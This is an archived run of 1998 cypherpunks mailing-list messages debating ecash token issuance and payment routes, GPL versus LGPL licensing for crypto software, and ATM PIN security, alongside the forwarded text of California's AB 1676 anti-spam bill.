>    instantaneous distribution."

[text deleted]


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Mon, 28 Sep 1998 23:33:01 +0800
To: Petro <cypherpunks@cyberpass.net
Subject: Re: Cypherpunks defeat?
In-Reply-To: <3.0.3.32.19980927223248.03463a7c@mail.atl.bellsouth.net>
Message-ID: <199809290428.VAA27584@proxy3.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



    --
At 04:06 PM 9/28/98 -0500, Petro wrote:
> The problem isn't issueing the tokens, it's the wallets.
> Token generation would be relatively straight forward, it's
> the user end.

On the contrary, it is the server end that is hard.

Token generation is trivial.  Paying for tokens and getting
paid for them is not trivial.

The problem is that we do not want to force everyone in the
universe to be the clients of a single giant issuer.  That
would bring us right back to the old problem of the
tyrannical and oppressive central bank.

Visualize the following situation.  I buy tokens from Bob,
who may be my local ISP.   I spend them on a server on a site
in Sri Lanka.  The owner of the server cashes them with
Evonne.  My money, aggregated with a multitude of other
peoples money in a multitude of other peoples transactions
flows by some complex and indirect route to through several
different people, and eventually to Evonne, and finally to
the owner of the server in Sri Lanka.

This is the problem that IBM software, for all its faults,
does address, and it is a hard problem. 

    --digsig
         James A. Donald
     6YeGpsZR+nOTh/cGwvITnSR3TdzclVpR0+pr3YYQdkG
     RP+4+If1PSzkOerZiquLbdw7GFRzWkLNjIpl59ZX
     4XzwciXVO1P+jKBeMQjD7fwhYVJqnuMtiNYJ/PnL2
-----------------------------------------------------
We have the right to defend ourselves and our property, because 
of the kind of animals that we are. True law derives from this 
right, not from the arbitrary power of the omnipotent state.


http://www.jim.com/jamesd/      James A. Donald




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Mon, 28 Sep 1998 23:09:09 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Toto -- mimic function or the real thing (Re: no subject)
In-Reply-To: <m0zNfGX-0003b7C@ulf.mali.sub.org>
Message-ID: <v03130301b2360de8fbd5@[209.133.20.17]>
MIME-Version: 1.0
Content-Type: text/plain



At 5:09 PM -0700 9/28/98, Adam Back wrote:
>Ulf Moeller writes:
>> Toto? writes:
>> >  Blanc and Carroll watched in total amazement as
>> >Jim Choate's ludicrous/inane computer and business theories
>> >seemed to be somehow transformed, by unseen hands working
>> >behind the scenes, into fully functional and viable
>> >RealWorld(TM) concepts, in Choate's work with the Armadillo
>> >Group.
>>
>> Huh? Is Toto back?
>
>Dunno, but that sure looks like authentic Toto doesn't it (and the
>rest of the long post of which excerpt quoted above).  Either someone
>has a very high quality mimic function for his writing style, or is
>rather good at imitating his writing style manually, or Toto is still
>around, and Toto isn't Carl Johnson.

Crap. I detected this as ersatz Toto after a couple of paragraphs.
Metaphors were too strained, or something. It just seemed fake.


Won't change the outcome of his incarceration, esp. now that he's in the
psychiatric "System." If he wasn't crazy before, he soon will be.


--Tim May


(This space left blank pending determ. of acceptability to the gov't.)
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Mon, 28 Sep 1998 21:09:22 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: NSA on TDC....
Message-ID: <199809290212.VAA04368@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

There is a show on TDC right now (21:09 Ctl.) on the NSA. Has some
interesting shots of their CRITIC center as well as a brief discussion of
their computing resources.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Mon, 28 Sep 1998 23:29:02 +0800
To: Jim Choate <cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Cypherpunks defeat? (fwd)
In-Reply-To: <199809290306.WAA04772@einstein.ssz.com>
Message-ID: <199809290428.VAA27705@proxy3.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



Eric Murray <ericm@lne.com>
> > But it's ok for the merchant to offer 'discounts' for 
> > buyers who use cash instead of credit cards.  That
> > 'discount' is the real price of the goods with the
> > credit-card surcharge subtracted.  Often that's 3-4%,
> > sometimes as low as 1.2%.

At 10:06 PM 9/28/98 -0500, Jim Choate wrote:
> I haven't seen that in 10 years or more. I doubt that
> anyone will find this approach very widely.

I find this invariably happens with buying computers or guns
from cheap sources.  If you have never encountered this, you
are paying too much for your computers and your guns. 

    --digsig
         James A. Donald
     6YeGpsZR+nOTh/cGwvITnSR3TdzclVpR0+pr3YYQdkG
     rdf4ouUG+RnLXI0ylstU8mnhwqMyFkqPh1X52jgG
     4gZZRTeCp1GmQaxeNcrXu1XphSsTCv8oSiu1+Emrb
-----------------------------------------------------
We have the right to defend ourselves and our property, because 
of the kind of animals that we are. True law derives from this 
right, not from the arbitrary power of the omnipotent state.


http://www.jim.com/jamesd/      James A. Donald




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Mon, 28 Sep 1998 21:48:11 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: cypherpunk license: PLEASE STEAL ME (Re: GPL & commercial software, the critical distinction) (fwd)
Message-ID: <199809290250.VAA04605@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 29 Sep 1998 03:22:27 +0100
> From: Adam Back <aba@dcs.ex.ac.uk>
> Subject: Re: cypherpunk license: PLEASE STEAL ME (Re: GPL & commercial software, the critical distinction) (fwd)

> Yes, I know, I have read LGPL a few times, and it does include the
> sorts of exceptions you describe.  But I said GPL, and GPL is the
> license which I was suggesting causes problems.  As I said, LGPL is
> sort of useable.

GPL and LGPL both support fully this model of commercial use of L/GPL'ed
code.

> Right, this is the major sticking point for commercial people I find.

I find most commercial people lack imagination, though they make up for it
with a desire for money.

> Yes, but the more interesting, less restrictive case is where they
> really want to modify the code.  cf the example I gave of say adding
> pgp5 compatibility to pgp26ui.

There would be no significant problem if you include the necessary stubs and
make them L/GPL'ed. By both the L/GPL the use of 3rd party code (L/GPL'ed,
PD, or proprietary) hanging off those stubs would NOT be L/GPL'ed.

> I think that if you modify to any significant extent a GPL peice of
> software, and try to sell it you could run into problems.

There is ABSOLUTELY NOTHING in the L/GPL that prevents me from selling such
code at whatever price I can manage to charge for it, I could even change it
significantly. I, however, MUST include the source code or provide it for a
reasonable fee if requested by the end user. Your point is irrelevant.

Now if I try to sell it as (my) *copyrighted* code then I'm in for a world of
hurt and justifiably so. This, again, desire to take advantage of others
work is the hallmark of thieves and marketing droids (if there is a
difference between the two).

>  Your legal
> bill for trying to work out how bad it is will be expensive. 

Will be nil. The L/GPL themselves clearly state they don't override previous
copyrights of material that might be used with L/GPL'ed products. That L/GPL
subsumption ONLY applies to code that is built using L/GPL'ed source. In
other words for the L/GPL to be inovked on your code requires that you use
somebodies elses L/GPL'ed code in (NOT with) your code.

This is clearly understood by businesses that do use gcc/egc in that they
use no libraries, headers, etc. from L/GPL sources, develop them in-house or
buy them from 3rd parties. They only use the compiler/linker/tools to get
hooked together.

> If you want to be creative, you could do what you want to it ignoring
> the license, then provide a binary patch from their binary to your
> binary.  Or whatever.  Commercial lawyers are cautious animals though,
> so because you could theoretically hack around things does not mean
> that some company's lawyer is going to recommend that they do it.

The goal of the L/GPL is NOT to stop commercial programming, it is to return
to the end user a level of control and understanding (at least in principle)
so they may build a system to do what they want and not some marketing droid
at a multi-national.

This is NO hack, it is specificaly detailed in the L/GPL as a legitimate use
of such licensed code.

> That aspect of LGPL (availability of source) is useful to the extent
> that it encourages people to make source of the crypto parts
> available.

No, it suggests they should make the API definition available. As to it
being useful, it is critical to the long term stability of systems and the
continued development of imaginative software.

> Use of GNU development tools is a different, and more straight forward
> issue than using GNU licensed code.

Only if you don't understand the L/GPL.

> The point remains: the simplest and best thing to do about licenses if
> you are more concerned about crypto deployment than source
> availability is not to use GPL, and probably to avoid LGPL also.

No, the best thing to do is build your copyrighted libraries and release the
API's via headerfiles or whatever in the GPL'ed code.

> Use BSD, use PD, either is better than GPL for the purpose.

No, they're not because in PD you loose ALL control of your code and if
somebody else uses it in a commercial app or not then you're pretty much
screwed as they laugh their asses off on the way to the bank.

Considering the extend of BSD that would be the last choice of an OS that I
would bank my business on.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lazlo Toth <lazlototh@hempseed.com>
Date: Mon, 28 Sep 1998 21:00:10 +0800
To: Adam Back <petro@playboy.com
Subject: Re: Cypherpunks defeat?
In-Reply-To: <v04011708b235aa4a90ba@[206.189.103.244]>
Message-ID: <v04011701b235ed0a62c8@[199.125.99.14]>
MIME-Version: 1.0
Content-Type: text/plain



On or about 11:49 PM +0100 9/28/98, Adam Back wrote:
>You want to buy ecash tokens with plastic.  Ideally you want to be
>able to buy ecash tokens with an ATM card because you don't want to
>incur any withdrawal fee (ATM withdrawals incur no transaction fee the
>UK, US may be different.)

In the case of my US bank it's the opposite:  ATM withdrawals, unless I use
a machine owned by my bank, cost me US$1.50.  Credit card fees on the other
hand are paid by the merchant, who is contractually bound NOT to pass them
on to me.

>Buying ecash tokens with a credit card is going to result in the cash
>advance minimum fee, plus unwanted (and typically double digit APR)
>interest on the "advance".
>
>Debit cards are a bit cheaper, but still incur some fee (unless a bank
>could be persuaded to waive it for this class of transaction).

My debit card functions as both ATM and credit card.  When given a choice I
will always prefer to use it as a credit card, which costs me nothing.

-Lazlo




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Mon, 28 Sep 1998 22:04:34 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Cypherpunks defeat? (fwd)
Message-ID: <199809290306.WAA04772@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: Eric Murray <ericm@lne.com>
> Subject: Re: Cypherpunks defeat?
> Date: Mon, 28 Sep 1998 19:56:16 -0700 (PDT)

> using plastic.  But it's ok for the merchant to offer 'discounts' for
> buyers who use cash instead of credit cards.  That 'discount'
> is the real price of the goods with the credit-card surcharge
> subtracted.  Often that's 3-4%, sometimes as low as 1.2%.

I haven't seen that in 10 years or more. I doubt that anyone will find this
approach very widely.

> Visa and MasterCard don't have massive staffs and huge office
> buildings because they're dumb.

You don't know big corporations very well do you.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Mon, 28 Sep 1998 23:33:31 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Cypherpunks defeat? (fwd)
Message-ID: <199809290436.XAA05069@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Mon, 28 Sep 1998 21:13:36 -0700
> From: "James A. Donald" <jamesd@echeque.com>
> Subject: Re: Cypherpunks defeat? (fwd)

> At 10:06 PM 9/28/98 -0500, Jim Choate wrote:
> > I haven't seen that in 10 years or more. I doubt that
> > anyone will find this approach very widely.
> 
> I find this invariably happens with buying computers or guns
> from cheap sources.  If you have never encountered this, you
> are paying too much for your computers and your guns.=20

What in the world do you mean 'cheap sources'?

I doubt I'm paying too much for my hardware.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Mon, 28 Sep 1998 17:48:20 +0800
To: petro@playboy.com
Subject: Re: Cypherpunks defeat?
In-Reply-To: <v04011708b235aa4a90ba@[206.189.103.244]>
Message-ID: <199809282249.XAA22561@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Christopher Petro writes on cypherpunks:
> 	That being the case, I'd say a penny is just right. Enough to make
> one think, but not too hard.

Make it 1/100 of a penny; then if someone wants to charge 1p they can
charge 100 of them, the other way is not as easy to arrange.

> >>But for the scheme to be successful, we need many token
> >>issuers
> >Is there existing open software available for this?
> 
> 	The problem isn't issueing the tokens, it's the wallets. Token
> generation would be relatively straight forward, it's the user end.

The biggest problem is buying ecash, instantly.  It has to be instant,
and accountless, because otherwise people are going to walk off in
disgust and try somewhere else.

You want to buy ecash tokens with plastic.  Ideally you want to be
able to buy ecash tokens with an ATM card because you don't want to
incur any withdrawal fee (ATM withdrawals incur no transaction fee the
UK, US may be different.)

Buying ecash tokens with a credit card is going to result in the cash
advance minimum fee, plus unwanted (and typically double digit APR)
interest on the "advance".

Debit cards are a bit cheaper, but still incur some fee (unless a bank
could be persuaded to waive it for this class of transaction).


Due to the instant, accountless requirement, you need to say implement
it as a signed java applet, which implements a protocol allowing you
to authenticate yourself to the ATM network with your PIN and card
number.

Problem: it's rather easy to hack, would take some fraction of a
second to try all 10,000 pin numbers, although if the check is online,
they could disable the card after 3 tries or so.

Still the problem persists: attacker obtains (or generates) valid (or
possibly valid) credit card numbers, uses up the 3 tries on each card
number, and moves onto the next number.  They will get a sucess every
3,333 card numbers on average.  (This attack is as a by-product going
to annoy a lot of people who have their cards disabled as a result.)

Artificial delays won't work because the attacker can parallelise via
multiple IP addresses on card numbers and PINs in randomised
sequences.

So because of the inherent naffness of ATM security, you are stuffed.

David Birch suggested that the European smart card based credit/debit
cards (EMV cards) would be better because they are more secure.
However this has the start up cost of a smart-card reader, and
violates the requirement for instant, accountless (and especially
hardwareless) use.

Ideas for beefing up ATM PIN based security using existing hardware
(deployed Cards and PINs), to get it to an acceptable level of
security with a low enough user interaction overhead.

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Mon, 28 Sep 1998 23:53:33 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Cypherpunks defeat? (fwd)
Message-ID: <199809290455.XAA05296@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Mon, 28 Sep 1998 21:05:34 -0700
> From: "James A. Donald" <jamesd@echeque.com>
> Subject: Re: Cypherpunks defeat?

> On the contrary, it is the server end that is hard.

> The problem is that we do not want to force everyone in the
> universe to be the clients of a single giant issuer.  That
> would bring us right back to the old problem of the
> tyrannical and oppressive central bank.

This would argue that what is needed is a distributed server-less protocol.
A peer-to-peer mechanism with a local arbitration mechanism.

> Visualize the following situation.  I buy tokens from Bob,
> who may be my local ISP.   I spend them on a server on a site
> in Sri Lanka.  The owner of the server cashes them with
> Evonne.  My money, aggregated with a multitude of other
> peoples money in a multitude of other peoples transactions
> flows by some complex and indirect route to through several
> different people, and eventually to Evonne, and finally to
> the owner of the server in Sri Lanka.

Whatever that protocol is, it should take care of currency conversion
transparently. Perhaps the wrong approach has been taken from the get go. As
I understand the various approaches every one of the has worried about how
to get the users money transfered into digital tokens. What if we approach
it from the other end and ask:

How can one design a system which focuses on how a users token cache and
converting it to the appropriate currency as required can be realized 
Further, this mechanism should not rely on any centralized server or
arbitration mechanism while doing this specie conversion.

One potential mechanism (admittedly very roughly described) would be to let
each participant in a transaction to agree on the worth of those tokens and
not worry if Bob gets the same bank per token from Sam that he gets from
Sue. So how many tokens Bob gets from Sam each time Sam buys one of Bob's
used CD's wouldn't necessarily be the same number of tokens from Sue, even
though Bob charges the same amount to both Sam and Sue.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Tue, 29 Sep 1998 02:33:02 +0800
To: cypherpunks@toad.com>
Subject: Re: Virus for UNIX
In-Reply-To: <19980926171206.958.rocketmail@send103.yahoomail.com>
Message-ID: <3.0.5.32.19980929001031.00bc0660@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



>> On Han Solo <apocalipsisx@yahoo.com> is alleged to have written:
>> >Hello!!!
>> >Somebody can tell me about a site where I can find virus for UNIX
>> >systems.
>> >
>> >I need them please!!!!!!!!!

Go see the paper by Tom Duff and Doug McIlroy.

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Tue, 29 Sep 1998 02:42:40 +0800
To: cypherpunks@cyberpass.net
Subject: FWD: California Anti-Spam Legislation Signed
Message-ID: <3.0.5.32.19980929002627.00bc0ce0@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



Forwarded from two CYBERIA-L articles:
--------------------------------------
According to a CNET article, yesterday Gov. Wilson signed into law two
pieces of legislation regulating spam.  The first bill requires (1) special
labels on the e-mail, (2) either a real e-mail address or an 800 number
permitting the recipient to be removed from the distribution list, and (3)
penalties if violated.  The second bill (1) permits ISPs to sue spammers
for damages to their systems and (2) outlaws "spoofing."  (I haven't read
the text of the statutes, so my description is a summary of what the
article says.)

Article is at:

http://www.news.com/News/Item/0%2C4%2C26859%2C00.html?dd.ne.tx.ts1.0928

"Both bills go into effect January 1. [The second] provision applies to
email providers that have equipment located in the state. [The first]
provision affects spammers who are located in the state or those who send
unsolicited bulk email to computer users who reside in California."

-------------------------------------

The text of the bill follows the URL which does a better job with the strike outs
than the plain text appended below.

http://www.leginfo.ca.gov/pub/bill/asm/ab_1651-1700/ab_1676_bill_980820_amended_sen.html

Sorry the email width would not handle the URL on one line but ascii text
follows:

BILL NUMBER: AB 1676    AMENDED
        BILL TEXT

        AMENDED IN SENATE   AUGUST 20, 1998
        AMENDED IN SENATE   JUNE 30, 1998
        AMENDED IN ASSEMBLY   APRIL 28, 1998
        AMENDED IN ASSEMBLY   MARCH 26, 1998
        AMENDED IN ASSEMBLY   MARCH 12, 1998

INTRODUCED BY   Assembly Member Bowen
   (Coauthors:  Assembly Members Brown, Campbell, Kuehl, Leach,
Martinez, and Mazzoni)
   (Coauthors:  Senators Dills, Karnette, O'Connell, Solis,
Vasconcellos, and Watson)

                        JANUARY 14, 1998

   An act to amend Section 17538.4 of the Business and Professions
Code, relating to advertising.


        LEGISLATIVE COUNSEL'S DIGEST


   AB 1676, as amended, Bowen.  Advertising:  electronic mail.
   Existing law prohibits a person conducting business in this state
from faxing unsolicited advertising material, unless certain
conditions are satisfied.
   This bill would expand that prohibition to include the
transmission of unsolicited advertising by electronic mail (e-mail),
and would make several related changes.
   This bill would become inoperative if federal law on this subject
is enacted.
   Existing law provides for the regulation of advertising and
provides that a violation of those provisions is a crime.  This bill,
by creating additional prohibitions with regard to advertising,
would expand the scope of an existing crime, thereby imposing a
state-mandated local program.
  The California Constitution requires the state to reimburse local
agencies and school districts for certain costs mandated by the
state. Statutory provisions establish procedures for making that
reimbursement.
   This bill would provide that no reimbursement is required by this
act for a specified reason.
   Vote:  majority.  Appropriation:  no.  Fiscal committee:  yes.
State-mandated local program:  yes.


THE PEOPLE OF THE STATE OF CALIFORNIA DO ENACT AS FOLLOWS:


  SECTION 1.  Section 17538.4 of the Business and Professions Code is
amended to read:
   17538.4.  (a) No person or entity conducting business in this
state shall facsimile (fax) or cause to be faxed, or electronically
mail (e-mail) or cause to be e-mailed, documents consisting of
unsolicited advertising material for the lease, sale, rental, gift
offer, or other disposition of any realty, goods, services, or
extension of credit unless:
   (1) In the case of a fax, that person or entity establishes a
toll-free telephone number that a recipient of the unsolicited faxed
documents may call to notify the sender not to fax the recipient any
further unsolicited documents.
   (2) In the case of e-mail, that person or entity establishes a
toll-free telephone number or valid sender operated return e-mail
address that the recipient of the unsolicited documents may call or
e-mail to notify the sender not to e-mail any further unsolicited
documents.
   (b) All unsolicited faxed or e-mailed documents subject to this
section shall include a statement informing the recipient of the
toll-free telephone number that the recipient may call, or a valid
return address to which the recipient may write or e-mail, as the
case may be, notifying the sender not to fax or e-mail the recipient
any further unsolicited documents to the fax number, or numbers, or
e-mail address, or addresses, specified by the recipient.
   In the case of faxed material, the statement shall be in at least
nine-point type.  In the case of e-mail, the statement shall be the
first text in the body of the message and shall be of the same size
as the majority of the text of the message.
   (c) Upon notification by a recipient of his or her request not to
receive any further unsolicited faxed or e-mailed documents, no
person or entity conducting business in this state shall fax or cause
to be faxed or e-mail or cause to be e-mailed any unsolicited
documents to that recipient.
   (d) In the case of e-mail, this section shall apply when the
unsolicited e-mailed documents are delivered to a California resident
via an electronic mail service provider's service or equipment
located in this state.  For these purposes "electronic mail service
provider" means any business or organization qualified to do business
in this state that provides individuals, corporations, or other
entities the ability to send or receive electronic mail through
equipment located in this state and that is an intermediary in
sending or receiving electronic mail.
   (e) As used in this section, "unsolicited e-mailed documents"
means any e-mailed document or documents consisting of advertising
material for the lease, sale, rental, gift offer, or other
disposition of any realty, goods, services, or extension of credit
that meet both of the following requirements:
   (A)
   (1)  The documents are addressed to a recipient with whom the
initiator does not have an existing business or personal
relationship.
   (B)
   (2)  The documents are not sent at the request of, or with
the express consent of, the recipient.
   (f) As used in this section, "fax" or "cause to be faxed" or
"e-mail" or "cause to be e-mailed" does not include or refer to the
transmission of any documents by a telecommunications utility or
Internet service provider to the extent that the telecommunications
utility or Internet service provider merely carries that transmission
over its network.
   (g) In the case of e-mail that consists of unsolicited advertising
material for the lease, sale, rental, gift offer, or other
disposition of any realty, goods, services, or extension of credit,
the subject line of each and every message shall include "ADV:" as
the first four characters.  If these messages contain information
that consists of unsolicited advertising material for the lease,
sale, rental, gift offer, or other disposition of any realty, goods,
services, or extension of credit, that may only be viewed, purchased,
rented, leased, or held in possession by an individual 18 years of
age and older, the subject line of each and every message shall
include "ADV:ADLT" as the first eight characters.
   (h) An employer who is the registered owner of more than one
e-mail address may notify the person or entity conducting business in
this state e-mailing or causing to be e-mailed, documents consisting
of unsolicited advertising material for the lease, sale, rental,
gift offer, or other disposition of any realty, goods, services, or
extension of credit of the desire to cease e-mailing on behalf of all
of the employees who may use employer-provided and
employer-controlled e-mail addresses.
   (i) This section, or any part of this section, shall become
inoperative on and after the date that federal law is enacted that
prohibits or otherwise regulates the transmission of unsolicited
advertising by electronic mail (e-mail).
  SEC. 2.  No reimbursement is required by this act pursuant to
Section 6 of Article XIIIB of the California Constitution because the
only costs that may be incurred by a local agency or school district
will be incurred because this act creates a new crime or infraction,
eliminates a crime or infraction, or changes the penalty for a crime
or infraction, within the meaning of Section 17556 of the Government
Code, or changes the definition of a crime within the meaning of
Section 6 of Article XIIIB of the California Constitution.
   Notwithstanding Section 17580 of the Government Code, unless
otherwise specified, the provisions of this act shall become
operative on the same date that the act takes effect pursuant to the
California Constitution.


-------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Mon, 28 Sep 1998 18:44:23 +0800
To: cypherpunks@cyberpass.net
Subject: Why GNU GPL is bad for crypto deployment
Message-ID: <199809282336.AAA23094@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Someone asked me in email why I said on coderpunks & cypherpunks:

> > If one is interested to encourage people to include crypto in their
> > applications, GNU style licenses are a step in the wrong direction.

And as I wrote a longish explanation, I thought I'd share it:

Here is problem: say that our goal is to maximise deployment of
software with crypto built in, especially commercial software.

So people write libraries, and software say like Eric Young's SSLeay,
or Werner Koch's GNUGP (OpenPGP implementation).

Some of these people then use GNU license because that is the friendly
net ethos of the way to do it.  (And in general I agree, but there is
a conflict here...)

So now the license on the libraries or software that they've written
(specifically to encourage commercial companies to add crypto) are
evaluated by the prospective companies lawyers.

The lawyer observes that, GNU license says:

1) thou shalt adopt the GNU license for your whole source tree, if
there is one line of GNU derived code in it.

(or words to effect).

And he goes ... hmmm ... so what else does GNU license say if we put
our source under GNU license.

It also says:

2) source shall be available for shipping and handling fee only

(or words to effect)

and he grumbles, and maybe causes the project to be scrapped, if the
company has ideas on keeping source code secret (though we all know
this is not a good idea especially for crypto code, such companies
exist, these the parameters we are mostly working within).

so if the project is still ok by the lawyer, he examines the license
some more, and it says:

3) it shall be allowed for anyone to take and re-distribute any GNU
software charging what they like.

(or words to effect)

And he goes (floating point exception... core dumped!)  Because it
means that his companies software can be legally copied and re-sold
with no financial benefit to his company.

Which is why companies won't touch GNU license stuff with a barge
pole.

Note that there are two licenses promoted by FSF: the GPL (GNU General
Public License) and the GNU LGPL (GNU Library General Public License).

The GNU LGPL is as I commented in an earlier post just about usable
for commercial purposes, because it does not infect the source tree
using the code with the LGPL (or GPL) because it allows specifically
for providing only the code for the library and not the rest of the
code, and does not demand that the rest of the code use the same
license.

However Werner is using GPL for G10 aka GNUPG (at least as of
g10-0.0.0 which is the version I have).

So the plea is, if you are going to use GNU, at least use GLPL and NOT
GPL.

Well, it's your code, and you wrote it, so it's your choice: my
comments are based on the assumption that the author is more
interested in crypto deployment than in the GNU license virus as a
means of promoting the availability of source code.

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Stutz <stutz@dsl.org>
Date: Mon, 28 Sep 1998 23:51:40 +0800
To: Adam Back <aba@dcs.ex.ac.uk>
Subject: Re: Why GNU GPL is bad for crypto deployment
In-Reply-To: <199809282336.AAA23094@server.eternity.org>
Message-ID: <Pine.LNX.3.96.980928220839.23420C-100000@shell.nacs.net>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 29 Sep 1998, Adam Back wrote:

> Here is problem: say that our goal is to maximise deployment of
> software with crypto built in, especially commercial software.

I think your argument is only valid if you replace "commercial" with
"proprietary" and replace "especially" with "only in the case of."


> Well, it's your code, and you wrote it, so it's your choice: my
> comments are based on the assumption that the author is more
> interested in crypto deployment than in the GNU license virus as a
> means of promoting the availability of source code.

Free software is not about simply providing the source code as a
programmer's convenience, but it ensures that each user has freedom. And
free sofware always leads to the development of _more_ free software (case
in point: GNU C++, which was built off gcc and developed by a consortium
that usually releases non-free software. I expect the same kind of synergies
to occur with GPG and other crypto-related free projects).

If your goal is to maximize the amount of *non-free* software that contains
built-in crypto, then the GNU GPL is not the license to use, because it does
not pander to corporations and other large organizations who benefit by
restricting information to individuals.

If you release your crypto code as public domain, those companies who sell
binaries of non-free, proprietary software will eagerly use your code in
their products. But they (or the govt, or anyone else) are not obligated to
release the source of any improvements or modifications made to your code.

You might think, "This trade-off is okay, since my original code is still
available. But I want the best of both words -- I want GNU people to use my
code, but I also want Microfoo to adapt it, too."

The prospect of Microfoo possibly using your code might tempt you -- this
might get your code in more places right now, but it will not benefit to the
free software community (depending on your license terms, the code may well
be unuseable, or only useable until a replacement is written), and the users
of Microfoo's verion will be deprived of their freedoms to distribute or
adapt your code. So it might not help your long-term goal of maximum crypto
deployment.

Furthermore, if the code were to be released under a "cypherpunks license"
as described -- which added additional restrictions to the use of the code
-- it would not be useable at all on free operating systems. (This is why
PGP had to be rewritten from scratch.)

I would suggest that the GNU GPL, which protects the freedom of all
individuals who use the software, and ensures that the information always
remains free, may be as "cypherpunk" as a software license can get, if the
idea is to keep the information free.

If you want to publish code that individuals are be free to run, copy,
distribute, study, adapt and improve, write free software that can be used
on free operating systems. If you work on and improve this free software,
the body of free software will increase and the currently-in-use non-free
software will head closer to 100% obsolescence. By writing free code, you
will catalyze this process and ensure that free systems contain your code.
You might not have your crypto code on as many systems tomorrow as you would
have if you had been tempted by the thought of proprietary use of your code,
but for the long term, it seems that the best way to ensure that strong
crypto be available everywhere for all individuals is to make that crypto
code free, without exception -- and the best way to do that is to copyleft
it.

For a list of current FSF crypto-related projects, please see
<http://www.gnu.org/prep/tasks.html#SEC8>.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
